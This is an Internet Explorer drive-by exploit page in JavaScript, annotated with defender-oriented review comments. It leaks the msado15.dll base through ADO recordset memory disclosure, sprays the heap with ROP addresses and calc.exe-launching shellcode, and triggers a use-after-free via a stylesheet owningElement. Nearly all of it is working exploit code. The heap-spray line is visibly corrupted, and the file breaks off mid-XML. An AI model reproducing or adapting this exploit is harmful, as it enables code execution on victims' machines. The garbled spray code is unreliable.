var StartTime = new Date();
// Number of heap.alloc() calls SprayHeap performs before it stops. SprayHeap compares against this;
// FaseTwo compares CurrentHeapSpraySize against the literal 900 instead of this name.
var FinalHeapSpraySize = 900;
//var SmallHoleSize = 0x1F0;
// Assigned to localxmlid1.CacheSize in FaseOne. The author's "small hole?" remark there and the
// earlier value kept above suggest the number was tuned by trial.
var SmallHoleSize = 0x240;
// Rows added and then deleted so far by IncreaseRowCounter; it stops scheduling itself at 0x10120.
var GlobalRowCounter = 0;
// ADO recordsets of the XML data islands xmlid1, xmlid2, xmlid3 and xmlid5; set in FaseOne.
var localxmlid1;
var localxmlid2;
var localxmlid3;
var localxmlid5;
// Base address derived in FindADOBase from two values it reads back (its alert text names msado15.dll).
// Stays 0 until that step succeeds; FaseTwo adds fixed offsets to it.
var adobase = 0;
// Spray block string built in FaseTwo; SprayHeap passes it to heap.alloc().
var finalspray = '';
// heapLib.ie instance created in FaseTwo. heapLib.js is loaded by a separate script tag and is not on this page.
var heap = null;
// Seconds shown by the RunExploitTimer countdown (one tick per 500 ms). The author's spelling of "ExploitTime".
var ExpoitTime = 10;
// Number of heap.alloc() calls made so far by SprayHeap.
var CurrentHeapSpraySize = 0;


// Entry point, scheduled from the body's onLoad handler; it only starts phase one.
function Start() {
        FaseOne();
}

 

function FaseOne() {

  localxmlid1 = document.getElementById('xmlid1').recordset;   
  localxmlid2 = document.getElementById('xmlid2').recordset;   
  localxmlid3 = document.getElementById('xmlid3').recordset;   
  localxmlid5 = document.getElementById('xmlid5').recordset;   
 
  localxmlid2.CacheSize = 0x40000358;
 
  localxmlid1.CacheSize = SmallHoleSize;;   //small hole?
  localxmlid1.AddNew(["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"], ["c"]);
  localxmlid5.AddNew(["BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"], ["c"]);
 
 
  var my1field = localxmlid5.Fields.Item(0);
  localxmlid1.MoveFirst();
 
  localxmlid2.AddNew(["BBBB"], ["c"]); 
 
  localxmlid1.Close();
  CollectGarbage();
 
  localxmlid3.MoveFirst();
 
  void(Math.atan2(0xbabe, ('###################### 2 Move First').toString()));
  localxmlid2.MoveFirst();

  void(Math.atan2(0xbabe, ('###################### 5 Move First').toString()));
  localxmlid5.CacheSize = 0x40000008;
  localxmlid5.MoveFirst();
  localxmlid3.AddNew(["MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong"], ["cccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuFINDMEccccc"]);

  var localxmlid4 = document.getElementById('xmlid4').recordset;   

  localxmlid4.AddNew(["bb"], ["c"]);

  localxmlid4.MoveNext(); 
 
 
  var localxmlid6 = document.getElementById('xmlid6').recordset;
  localxmlid6.AddNew(["CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"], ["c"]); 
 
  localxmlid2.MoveFirst();
 
  Math.tan(1);
 
  document.getElementById('textfaseone').innerText = 'Setting up data for ASLR evasion:';
  if(GlobalRowCounter < 0x10120) {
          window.setTimeout(IncreaseRowCounter, 100);
  }
}


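// Phase one, second step: adds and deletes a "BBBB" row on the xmlid2 recordset 0x300 times per tick,
// updates the progress text and reschedules itself every 100 ms until GlobalRowCounter reaches
// 0x10120 (the counter overshoots by up to 0x2FF; only the `<` test matters). It then hands over to
// FindADOBase. Timer callback with no return value.
// Fix: the loop index is declared with var instead of leaking as an implicit global.
function IncreaseRowCounter() {
        if(GlobalRowCounter < 0x10120) {
          for(var i = 0; i < 0x300; i++) {
                  GlobalRowCounter++;
      localxmlid2.AddNew(["BBBB"], ["c"]);
      localxmlid2.Delete();
    }
    var percentcomplete = Math.round(GlobalRowCounter /0x10120 * 100);
    document.getElementById('progressfaseone').innerText = percentcomplete + "%";
    window.setTimeout(IncreaseRowCounter, 100);
  }
  else {
          document.getElementById('textfaseonedone').innerText = 'Now searching memory for suitable vtable. Please wait...';
          window.setTimeout(FindADOBase, 100);
  }
}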

// Stage two of the setup. Takes field 1 of the xmlid3 recordset and, while rows
// are added to xmlid2 (first loop, up to 0xDF6 iterations), waits until the
// field's name no longer equals the long literal it was created with. The
// second loop (up to 0xAE0 iterations) keeps adding rows and scans two-character
// windows of the same field name, via escape(), for the %uAD68 and %uD738
// markers; each hit is byte-swapped into a hex string (vftable1 / vftable2).
// If both candidates agree on one base after subtracting the fixed offsets
// 0x1AD68 and 0xD738, the global `adobase` is set from it, a "found base
// address" message is shown and FaseTwo() is called; otherwise an alert reports
// that the base of msado15.dll could not be read.
//
// Review notes (defender view):
//  - The field name changing from its literal and then yielding pointer-like
//    values is the memory-disclosure behaviour this sample relies on; the
//    vendor update for this issue is the mitigation.
//  - `myfield.Name` (first loop) and `myfield.name` (second loop) are spelled
//    differently; presumably resolved case-insensitively by the COM object —
//    confirm.
//  - The loop index `i` is an implicit global. The Math.atan2(0xbabe, ...)
//    calls are WinDbg tracing hooks (see the heapLib.js header) and are inert
//    without a debugger attached.
//  - The success message prints "<censored>"; the real address output is
//    commented out.
function FindADOBase() {
        //alert('FindADOBase');


  var myfield = localxmlid3.Fields.Item(1);

          for(i = 0; i < 0xDF6; i++) {
      localxmlid2.AddNew(["BBBB"], ["c"]);
      localxmlid2.MoveFirst();
      if(myfield.Name != "MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong") {
              break;
      }
    }
    //alert('done first');

  void(Math.atan2(0xbabe, ('###################### Add untill vftable 2').toString()));

  var vftable1 = null;
  var vftable2 = null;

          for(i = 0; i < 0xAE0; i++) {
                  void(Math.atan2(0xbabe, ('add row: ' + i).toString()));
      localxmlid2.AddNew(["BBBB"], ["c"]);
      localxmlid2.MoveFirst();
      //if(i > 10) {
      //  document.forms[0].myresult.value += i.toString(16) + " : " + escape(myfield.name.substr((2 * i) + 4, 8)) + " : "  + myfield.name.length + "\n";
      //}
      // Two characters at offset 2*i+4 are read as one %uXXXX%uYYYY pair and
      // swapped into "YYYYXXXX" hex order.
      if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uAD68/)) {
              vftable1 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1");
      }
      if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uD738/)) {
              vftable2 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1");
      }
      if(vftable1  && vftable2) {
              break;
      }
    }
   //document.forms[0].myresult.value += "\n\nVFTABLES: " + vftable1 + " : " + vftable2 + "\n\n\n";
   //alert(vftable1);
   // Self-check: both candidates must yield the same base (parseInt(null,16)
   // is NaN, so a missing candidate fails this comparison).
   if((parseInt(vftable1,16) - 0x1AD68) == (parseInt(vftable2,16) - 0xD738)) {
            adobase = parseInt(vftable1,16) - 0x1AD68;
            document.getElementById('textfoundaddress').innerText = 'Found base address of <censored>.dll: 0x<censored>';// + adobase.toString(16);
            FaseTwo();
   }
   else {
     alert('sadly we failed to read the base address of msado15.dll :( ');
   }

}

// Stage three: builds the heap-spray block and schedules the spray.
// Creates a heapLib.ie instance with a 0x20000 maxAlloc, builds `heapspray`
// from %u-escaped words and MakeAddressString() values relative to `adobase`
// (so the block depends on the base found by FindADOBase), pads it to at least
// 0x200 characters with %u4444, doubles it until it is at least 0x40000
// characters and stores substring(2, 0x40000 - 0x21) in the global
// `finalspray`. The page text calls this "Setting up heap for DEP evasion".
//
// Review notes (defender view):
//  - As reproduced here the `var heapspray = ...` statement is not valid
//    JavaScript (a split identifier and stray `, , ,` inside the expression),
//    and the string line following the commented-out copy is an unterminated
//    expression; this copy of the file does not parse.
//  - The final branch compares CurrentHeapSpraySize with the literal 900 while
//    SprayHeap() compares with FinalHeapSpraySize; presumably the same value,
//    but both should reference one constant.
//  - On the else path RunExploit() is called directly, bypassing the
//    countdown in RunExploitTimer().
function FaseTwo() {
        document.getElementById('textfasetwo').innerText = 'Setting up heap for DEP evasion:';
        document.getElementById('progressfasetwo').innerText = '0%';
  heap = new heapLib.ie(0x20000);


  var heapspray = unescape("%u2020%u1604%u0102, %u0103%u0104%u0105" + MakeAddre, , , ssString(adobase + 0x117C3) + MakeAddressString(adobase + 0x, 1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123" + MakeAddressString(adobase)  + "%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F" +
                  "%u9090%u9090%u868B%u1108%u0000%u5056%u056A%uA068%u0421%u0516%u185E%u0008%uD0FF%u5058%u0590%u0BBB%u0000%uD0FF%uF88B%u0558%u3B47%u0000%u006A%uFF57%uCCD0" + "%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF" +
                  "%u6163%u636C%u652E%u6578%u0000%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578%u0000%u0000" + "%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF");
                  //"%u6163%u636C%u652D%u6578%u0000
                 //%u3A63%u775C%u6E69%u6F64%u7377%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578
                 //c:\windows\system32\calc.exe
                 //%63%61%6C%63%2E%65%78%65
                 //%63%3A%5C%77%69%6E%64%6F%77%73%5C%73%79%73%74%65%6D%33%32%5C%63%61%6C%63%2E%65%78%65

  //var heapspray = unescape("%u2020%u1604%u0102%u0103%u0104%u0105" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123%u0124%u0125%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F%u0170%u0171%u0172%u0173%u0174%u0175%u0176%u0177%u0178%u0179%u017A%u017B%u017C%u017D%u017E%u017F%u0180%u0181%u0182%u0183%u0184%u0185%u0186%u0187%u0188%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF%u01C0%u01C1%u01C2%u01C3%u01C4%u01C5%u01C6%u01C7%u01C8%u01C9%u01CA%u01CB%u01CC%u01CD%u01CE%u01CF%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + 
"%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF");

  // Pad the block to at least 0x200 characters.
  while(heapspray.length < 0x200) heapspray += unescape("%u4444");

  // Repeat the block until it is at least 0x40000 characters, then trim it
  // (drop the first 2 characters and stop 0x21 short of 0x40000).
  var heapblock = heapspray;
  while(heapblock.length < 0x40000) heapblock += heapblock;
  finalspray = heapblock.substring(2, 0x40000 - 0x21);

  //alert('Base address of ado15.dll ' + adobase.toString(16));
  if(CurrentHeapSpraySize < 900) {
          window.setTimeout(SprayHeap, 100);
  }
  else {
          RunExploit();
  }
}

// Timer-driven heap spray. Each 100 ms tick allocates 90 more copies of the
// global `finalspray` through heap.alloc(), bumps CurrentHeapSpraySize and
// updates 'progressfasetwo'; once the counter reaches FinalHeapSpraySize - 1 it
// writes the "Ready to start calc.exe" text and schedules RunExploitTimer().
//
// Review notes (defender view):
//  - finalspray is just under 0x40000 characters (built in FaseTwo); at two
//    bytes per character (the 4 + len*2 + 2 BSTR size heapLib uses) that is
//    roughly 512 KB per allocation, so ~900 allocations grow the process by
//    several hundred MB within seconds. Rapid, steady memory growth of a
//    browser tab that is also ticking a "%" counter is a usable behavioural
//    detection signal for sprays of this kind.
//  - heap.alloc() throws for the OLEAUT32-cached sizes (32/64/256/32768);
//    the size used here is far above those, so no exception path is hit.
//  - Unlike the other loops in this file, the index here is declared with
//    `var` and does not leak into the global scope.
function SprayHeap() {
  if(CurrentHeapSpraySize < FinalHeapSpraySize - 1) {
    for(var i = 0; i < 90; i++) {
      heap.alloc(finalspray);
      CurrentHeapSpraySize++;
    }
    var percentcomplete = Math.round(CurrentHeapSpraySize /FinalHeapSpraySize * 100);
    document.getElementById('progressfasetwo').innerText = percentcomplete + "%";
    window.setTimeout(SprayHeap, 100);
  }
        else {
                document.getElementById('textfasetwodone').innerText = "Ready to start calc.exe in: ";
                window.setTimeout(RunExploitTimer, 100);
        }

}

// Visible countdown before the final stage. Every 500 ms the current value of
// the ExpoitTime global is shown in 'countexploitrun' and then decremented;
// when it is no longer > 0 the element is set to 0, the elapsed wall-clock
// time since the StartTime global is written to 'totalruntime' and
// RunExploit() is scheduled 100 ms later.
function RunExploitTimer() {
        if(!(ExpoitTime > 0)) {
                document.getElementById('countexploitrun').innerText = 0;
                var elapsedMs = new Date().getTime() - StartTime.getTime();
                var TotalRun = Math.round(elapsedMs / 1000);
                document.getElementById('totalruntime').innerText = "Total exploitation time: " + TotalRun + " seconds";
                window.setTimeout(RunExploit, 100);
                return;
        }
        // Show first, reschedule, then decrement (same order as before).
        document.getElementById('countexploitrun').innerText = ExpoitTime;
        window.setTimeout(RunExploitTimer, 500);
        ExpoitTime--;
}
   
// Final stage. Creates 100 detached div elements, grabs the first stylesheet's
// owning element and its imports collection, appends and then removes the
// owning element from the document, replaces it via outerHTML, forces a
// garbage collection (CollectGarbage is a JScript-only global), assigns a
// %u-escaped string as className on each of the 100 divs and finally calls
// owningObj.insertAdjacentElement(myimports, 'a').
//
// Review notes (defender view):
//  - `owningObj`, `myimports`, `Result` and the loop index `i` are assigned
//    without `var`, so they become window globals.
//  - The last call passes the imports collection where a position string is
//    expected; together with the detach / outerHTML / GC sequence this appears
//    to be the step that exercises the underlying bug. The vendor update is
//    the fix; the Math.atan2(0xbabe, ...) calls are WinDbg tracing hooks (see
//    heapLib.js) and are inert otherwise.
//  - Script-level instrumentation can observe this sequence: an explicit
//    CollectGarbage() call, reattachment of a stylesheet owning element, and
//    identical large %u-escaped className strings on many fresh elements.
function RunExploit() {

  var elms = new Array();
  for(i =0; i < 100; i++) {
          elms.push(document.createElement('div'));
  }

  owningObj = document.styleSheets[0].owningElement;

  myimports = document.styleSheets[0].imports;

  document.appendChild(owningObj);
  document.removeChild(owningObj);

  owningObj.outerHTML = 'a';

  Math.atan2(0xbabe, "Collect");
  CollectGarbage();

  Math.atan2(0xbabe, "spray");
  for(i = 0; i < 100; i++) {
          elms[i].className = unescape("%u4140%u4141%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u2020%u1604%u2020%u1604%u4159%u415a%u415b");
  }

  Result = owningObj.insertAdjacentElement(myimports,'a');


}

// Returns a 32-bit address as a "%uLLLL%uHHHH" escape string: the hex digits
// of addrint with the two 16-bit halves swapped, which is the order needed to
// feed unescape(). Values whose hex form is shorter than eight digits do not
// match the pattern and are returned as plain hex.
function MakeAddressString(addrint) {
        var hexdigits = addrint.toString(16);
        // Swap the high and low 16-bit halves into %u escapes.
        return hexdigits.replace(/(\w\w\w\w)(\w\w\w\w)/,"%u$2%u$1");
}
   
    </script>

  </head>
  <body onLoad="window.setTimeout(Start,100);" id="bodyid">
  <div>
          <h2 id="textfaseone"></h2>
         
    <h2 id="progressfaseone"></h2>
   
    <h2 id="textfaseonedone"></h2>
   
    <h2 id="textfoundaddress"></h2>
   
    <h2 id="textfasetwo"></h2>
   
    <h2 id="progressfasetwo"></h2>
   
    <h2 id="textfasetwodone"></h2>
   
    <h2 id="countexploitrun"></h2>
   
    <h2 id="totalruntime"></h2>
  </div>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid1">
<Devices>
<Device>
<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid2">
<Devices>
<Device>
<BBBB />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid3">
<root>
<data>
        <SmallData>
  </SmallData>
<MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyD